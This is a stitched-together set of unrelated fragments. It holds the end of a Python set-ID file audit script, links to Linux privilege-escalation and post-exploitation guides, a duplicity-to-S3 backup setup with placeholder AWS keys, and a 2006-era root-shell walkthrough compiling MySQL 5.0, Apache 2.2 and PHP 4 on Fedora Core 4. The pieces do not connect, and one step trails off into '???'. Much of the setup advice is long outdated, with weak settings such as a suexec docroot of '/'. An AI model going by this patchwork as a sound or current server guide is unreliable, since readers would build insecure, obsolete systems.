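    since the baseline; additions and changes are what to alert on."""
    return {
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
        "changed": sorted(p for p in current
                          if p in baseline and current[p] != baseline[p]),
    }


def main(argv):
    """usage: suid_audit.py <root> <baseline.json>  (constructed names).
    The first run writes the baseline; later runs exit 1 when anything
    differs, which makes the script usable as a cron job."""
    root, baseline_path = argv[1], argv[2]
    current = inventory(root)
    if not os.path.exists(baseline_path):
        with open(baseline_path, "w") as f:
            json.dump(current, f, indent=1, sort_keys=True)
        print("baseline written with %d set-ID files" % len(current))
        return 0
    with open(baseline_path) as f:
        report = diff_baseline(json.load(f), current)
    print(json.dumps(report, indent=1))
    return 1 if any(report.values()) else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```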

Other (quick) guides & Links
Enumeration
http://www.0daysecurity.com/penetration-testing/enumeration.html
http://www.microloft.co.uk/hacking/hacking3.htm

Misc
http://jon.oberheide.org/files/stackjacking-infiltrate11.pdf
http://pentest.cryptocity.net/files/clientsides/post_exploitation_fall09.pdf
http://insidetrust.blogspot.com/2011/04/quick-guide-to-linux-privilege.html


The goal is to back up server files every time a file in a certain folder is updated, and to solve the server load problem. Instead of copying lots of files every X minutes, this app lets us copy each file as it is updated.


yum install duplicity --enablerepo=epel
wget https://github.com/splitbrain/Watcher/archive/master.tar.gz
tar -zxvf master.tar.gz
cd Watcher-master          # the GitHub archive unpacks into this directory
mv watcher.ini /etc/
cp -p watcher.py /usr/sbin/
Edit /etc/watcher.ini (it holds your AWS keys, so keep it readable only by the user that runs watcher):

events=create,modify,move,write_close,attribute_change
command=export AWS_ACCESS_KEY_ID=EDITKEY;export AWS_SECRET_ACCESS_KEY=EDITKEY;/usr/bin/duplicity $filename --no-encryption --no-compression --no-print-statistics s3+http://BUCKETNAME


Start the watcher:

/usr/sbin/watcher.py start


Here is a tutorial on setting up MySQL, HTTPD and PHP to build a web-based server (webserver). Previously there was a long, conversational tutorial; now I will condense it.

I am using:

[root@NGETOP widhe]# id;uname -a
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
Linux NGETOP.NET.BLOK.4 2.6.17-1.2142_FC4 #1 Tue Jul 11 22:41:14 EDT 2006 i686 i686 i386 GNU/Linux

With this minimal FC4 installation, I was quite overwhelmed updating/installing the required libraries..

MYSQL 5.0.24

[root@NGETOP widhe]# wget http://komo.padinet.com/mysql/Downloads/MySQL-5.0/mysql-standard-5.0.22-linux-i686.tar.gz

[root@NGETOP widhe]# tar -zxvf mysql-standard-5.0.22-linux-i686.tar.gz
[root@NGETOP widhe]# mv mysql-standard-5.0.22-linux-i686 /usr/local/mysql
[root@NGETOP widhe]# cd /usr/local/mysql
[root@NGETOP mysql]# scripts/mysql_install_db
Installing all prepared tables
Fill help tables

To start mysqld at boot time you have to copy support-files/mysql.server
to the right place for your system

PLEASE REMEMBER TO SET A PASSWORD FOR THE MySQL root USER !
To do so, start the server, then issue the following commands:
./bin/mysqladmin -u root password 'new-password'
./bin/mysqladmin -u root -h NGETOP.NET.BLOK.4 password 'new-password'
See the manual for more instructions.

You can start the MySQL daemon with:
cd .; ./bin/mysqld_safe &

You can test the MySQL daemon with the benchmarks in the ‘sql-bench’ directory:
cd sql-bench; perl run-all-tests

Please report any problems with the ./bin/mysqlbug script!

The latest information about MySQL is available on the web at
http://www.mysql.com
Support MySQL by buying support/licenses at http://shop.mysql.com
[root@NGETOP mysql]# cd ..
[root@NGETOP local]# chown -R root.mysql mysql
[root@NGETOP local]# chmod -R 640 mysql
[root@NGETOP local]# chmod -R u+X,g+X mysql
[root@NGETOP local]# chmod -R ug+x mysql/bin
[root@NGETOP local]# chmod -R g+w mysql/data
[root@NGETOP local]# chmod -R u+x mysql/scripts
[root@NGETOP local]# cp mysql/support-files/my-medium.cnf /usr/local/mysql/data/my.cnf
[root@NGETOP local]# chgrp mysql mysql/data/my.cnf
[root@NGETOP local]# cd mysql
[root@NGETOP mysql]# bin/safe_mysqld --user=mysql &
[1] 7162
WARNING: Found /usr/local/mysql/data/my.cnf
Datadir is deprecated place for my.cnf, please move it to /usr/local/mysql

Starting mysqld daemon with databases from /usr/local/mysql/data

[root@NGETOP mysql]# ps ax |grep mysql

[root@NGETOP mysql]# bin/mysqladmin -u root password 'passwordkamu'
[root@NGETOP mysql]# cp support-files/mysql.server /etc/rc.d/init.d/mysql
[root@NGETOP mysql]# chmod 744 /etc/rc.d/init.d/mysql
[root@NGETOP mysql]# chkconfig --add mysql
[root@NGETOP mysql]# service mysql restart
[root@NGETOP mysql]# ln -s /usr/local/mysql/bin/mysql /sbin/mysql
[root@NGETOP widhe]# mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 8 to server version: 5.0.22-standard-log

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql>

=== Done ===

HTTPD/APACHE 2.2.3 :

[root@NGETOP widhe]# wget http://apache.cbn.net.id/httpd/httpd-2.2.3.tar.gz
[root@NGETOP widhe]# tar -zxvf httpd-2.2.3.tar.gz
[root@NGETOP widhe]# cd httpd-2.2.3
[root@NGETOP httpd-2.2.3]# groupadd www
[root@NGETOP httpd-2.2.3]# useradd -g www www
[root@NGETOP httpd-2.2.3]# id www
uid=502(www) gid=502(www) groups=502(www)
[root@NGETOP httpd-2.2.3]# ./configure \
--prefix=/usr/local/apache \
--enable-mods-shared=all \
--enable-ssl \
--enable-suexec \
--with-suexec-bin=/usr/local/apache/bin/suexec \
--with-suexec-caller=502 \
--with-suexec-userdir=htdocs \
--with-suexec-docroot=/ \
--with-suexec-uidmin=502 \
--with-suexec-gidmin=502 \
--with-suexec-logfile=/usr/local/apache/logs/suexec_log \
--with-suexec-safepath=/usr/local/bin:/usr/bin:/bin

— truncated —

[root@NGETOP httpd-2.2.3]# make
[root@NGETOP httpd-2.2.3]# make install

PHP:

[root@NGETOP widhe]# wget http://id2.php.net/get/php-4.4.3.tar.gz/from/this/mirror
[root@NGETOP widhe]# tar -zxvf php-4.4.3.tar.gz
[root@NGETOP widhe]# cd php-4.4.3
[root@NGETOP widhe]# ./configure --prefix=/usr/local --with-apxs2=/usr/local/apache/bin/apxs --with-mysql-dir=/usr/local --with-xml --enable-bcmath --enable-calendar --enable-exif --enable-ftp --with-gettext --enable-mbstring --enable-mbstr-enc-trans --enable-mbregex --enable-discard-path --with-pear --with-ttf --enable-gd-native-ttf --with-openssl --with-zlib-dir=/usr/include --enable-libxml --with-libxml-dir=/usr/include/libxml2 --enable-module=so
[root@NGETOP widhe]# make
[root@NGETOP widhe]# make install

Then add AddType application/x-httpd-php .php and DirectoryIndex index.php index.html to the Apache configuration.

[root@NGETOP widhe]# cp php.ini-dist /usr/local/lib/php.ini
[root@NGETOP widhe]# chown -R root.www /usr/local/lib/php
[root@NGETOP widhe]# chmod -R g-w,o-rwx /usr/local/lib/php
[root@NGETOP widhe]# pico /etc/rc.d/init.d/httpd

Get its contents from ??? (contact me on Yahoo Messenger (YM), ID: ehdiw)

[root@NGETOP widhe]# chmod 755 /etc/rc.d/init.d/httpd
[root@NGETOP widhe]# chkconfig --add httpd
[root@NGETOP widhe]# service httpd start

Create test.php in /usr/local/apache/htdocs:
pico test.php
Contents:
<?php
phpinfo();
?>
